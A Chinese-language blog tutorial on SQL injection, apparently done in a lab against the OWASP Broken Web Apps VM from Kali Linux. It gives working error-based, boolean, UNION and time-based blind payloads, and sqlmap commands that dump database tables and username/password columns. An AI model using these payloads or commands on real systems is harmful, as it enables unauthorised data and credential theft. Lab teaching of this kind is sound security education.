在owasp年度top 10 安全問題中,注入高居榜首。SQL注入攻擊指的是通過構建特殊的輸入作為參數傳入Web應用程序, 而這些輸入大都是SQL語法里的一些組合,通過執行SQL語句進而執行攻擊者所要的操作,其主要原因是程序沒有細致地 過濾用戶輸入的數據,致使非法數據侵入系統。
- 對於Web應用程序而言,用戶核心數據存儲在數據庫中,例如MySQL、SQL Server、Oracle;
- 通過SQL注入攻擊,可以獲取、修改、刪除數據庫信息,並且通過提權來控制Web服務器等其他操作;
- SQL注入即攻擊者通過構造特殊的SQL語句,入侵目標系統,致使后台數據庫泄露數據的過程;
- 因為SQL注入漏洞造成的嚴重危害性,所以常年穩居OWASP TOP10的榜首!
1.實驗說明
目標靶機:OWASP_Broken_Web_Apps_VM_1.2
下載地址
測試滲透機:Kali-Linux-2018.2-vm-amd64
下載地址
1.SQL注入的危害
1、拖庫導致用戶數據泄漏;
2、危害web等應用的安全;
3、失去操作系統的控制權;
4、用戶信息被非法買賣;
5、危害企業及國家的安全!
2.注入流程
1. 判斷是否有SQL注入漏洞;
2. 判斷操作系統、數據庫和web應用的類型;
3. 獲取數據庫信息,包括管理員信息及拖庫;
4. 加密信息破解,sqlmap可自動破解;
5. 提升權限,獲得sql-shell、os-shell、登錄應用后台;
2.手動注入實戰
1.基於錯誤的注入
錯誤注入的思路是通過構造特殊的sql語句,根據得到的錯誤信息,確認sql注入點; 通過數據庫報錯信息,也可以探測到數據庫的類型和其他有用信息。
通過輸入單引號,觸發數據庫異常,通過異常日志診斷數據庫類型,例如這里是MySQL數據庫。
SQL注入語句解析:
mysql> select first_name,last_name from dvwa.users;
mysql> select first_name,last_name from dvwa.users where user_id='1';
#你輸入1 相當於在最后的兩個單引號中間插入一個1來執行mysql的查詢語句
怎么樣判斷我們是否可以注入呢?
會發生頁面報錯
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
SQL注入語句解析:
mysql> select first_name,last_name from dvwa.users where user_id='''
這就代表此網站我們可以注入,有注入點。
2.基於布爾的注入
這里面用到的是or,布爾邏輯注入的思路是閉合SQL語句,構造or邏輯語句、注釋多余的代碼
注入語句: ' or 1=1 -- '
原始語句:
mysql> select first_name,last_name from dvwa.users where user_id=''
SQL注入語句解析: ' or 1=1 -- '
mysql> select first_name,last_name from dvwa.users where user_id=' ' or 1=1 -- ' '
說明:
第一個' 用於閉合前面的條件
or 1=1 為真的條件
-- 將注釋后面的所有語句
仔細看where user_id=' ' or 1=1 -- ' ' 這個條件語句
user_id=' ' 這個語句肯定是假的,因為我們的ID是阿拉伯數字,而這里面是空,所以為假
但是1=1 這個語句肯定為真 -- ' ' 是注釋的意思,也就說后面的不用管
or 表示有一個條件為真就是真
那總得來說這個where語句一定為真
整個語句的意思是從dvwa庫的users表里面查詢first_name,last_name兩個字段的所有內容
3.基於UNION注入
UNION語句用於聯合前面的SELECT查詢語句,合並查詢更多信息;
一般通過錯誤和布爾注入確認注入點之后,便開始通過union語句來獲取有效信息。
//猜測數據列數
' union select 1 -- '
' union select 1,2 -- '
' union select 1,2,3 -- '
' union select 1,2,3,4 -- '
SQL注入語句解析:
mysql> select first_name,last_name from dvwa.users where user_id='' union select 1 -- ''
mysql> select first_name,last_name from dvwa.users where user_id='' union select 1,2 -- ''
//union是我們注入常用的方式,里面的1,2,3 代表的是字段名,union語句查詢的時候,前后的
字段數量必須相同,所以我們可以用數字代表字段,來猜測union之前的語句中有幾個字段。這里
顯然只有兩個字段。
你查詢的不一定非要是字段,也可以是版本,表之類的
//獲得當前數據庫及用戶信息
'union select version(), database() -- '
'union select user(), database() -- '
//查詢所有庫名
'union select TABLE_SCHEMA, 1 from INFORMATION_SCHEMA.tables -- '
#這里面的1 只是一個列的代替,沒有什么含義,但是如果你缺了這個1 前后列數量不一樣會報錯的
//查看所庫中所有表名
'union select table_name, 1 from INFORMATION_SCHEMA.tables -- '
//同時查詢表名及對應庫名
'union select TABLE_SCHEMA, table_name from INFORMATION_SCHEMA.tables -- '
//查詢數據列
'union select NULL, user from users -- ' 'union select NULL, password from users -- '
'union select user, password from users -- ' 'union select NULL, GRANTEE from USER_PRIVILEGES -- '
因為union前面只有兩個字段,那我們想要查詢多個字段怎么辦?
用mysql自帶的函數concat(),如
'union select password, concat(first_name,' ',last_name,' ',user) from users -- '
4.基於時間的盲注
有些數據庫對錯誤信息做了安全配置,使得無法通過以上方式探測到注入點,此時,通過設置sleep語句來探測注入點。
1' and sleep(5) -- '
SQL注入語句解析:
mysql> select first_name,last_name from dvwa.users where user_id='1' and sleep(5) -- ''
3.sqlmap自動化注入
SQL注入比較好用的工具,首推開源工具SQLmap。SQLmap是一個國內外著名的安全穩定性測試工具,可以用來進行自動 化檢測,利用SQL注入漏洞,獲取數據庫服務器的權限。它具有功能強大的檢測引擎,針對各種不同類型數據庫的安全穩 定性測試的功能選項,包括獲取數據庫中存儲的數據,訪問操作系統文件甚至可以通過外帶數據連接的方式執行操作系 統命令。 SQLmap支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB等數據庫的各種安全漏洞檢測。
1.GET方法注入
打開kali,用戶名root 密碼toor
查看幫助我們發現我們需要獲取到網頁的url
然后我們把該網頁的連接復制下來在kali里面進行測試
root@kali:~# sqlmap -u "http://192.168.13.144/mutillidae/index.php?page=user-info.php&username=yjssjm&password=123&user-info-php-submit-button=View+Account+Details"
sqlmap參數解析:
--users #所有用戶
--current-user #當前用戶
--dbs #所有庫
--current-db #當前庫
-D "database_name" --tables #指定庫名
-D "database_name" -T "table_name" --columns #指定庫名和表名
--dump-all #所有的內容
--dump-all --exclude-sysdbs
-D "database_name" -T "table_name" --dump
-D "database_name" -T "table_name" -C "username, password" --dump
#-C 指定字段
--batch //自動化完成
示例步驟:
1. 獲得當前數據庫
root@kali:~# sqlmap -u "你自己的url" --batch --current-db
2. 獲得數據庫表
root@kali:~# sqlmap -u "你自己的url" --batch -D nowasp --tables
3. 獲得表的字段
root@kali:~# sqlmap -u "你自己的url" --batch -D nowasp -T accounts --columns
4. 獲得表中的數據
root@kali:~# sqlmap -u "你自己的url" --batch -D nowasp -T accounts -C "username, password" --dump
2.POST方法注入
需要帶cookie才能訪問的注入頁面,--cookie=""
root@kali:~# sqlmap -u "http://192.168.13.144/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=ehqbg9j6di70nk4ku6fm187co1; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" --batch
參數跟get獲取的參數一樣,就是post需要用url+cookie
你們的評論和點贊是我寫文章的最大動力,蟹蟹。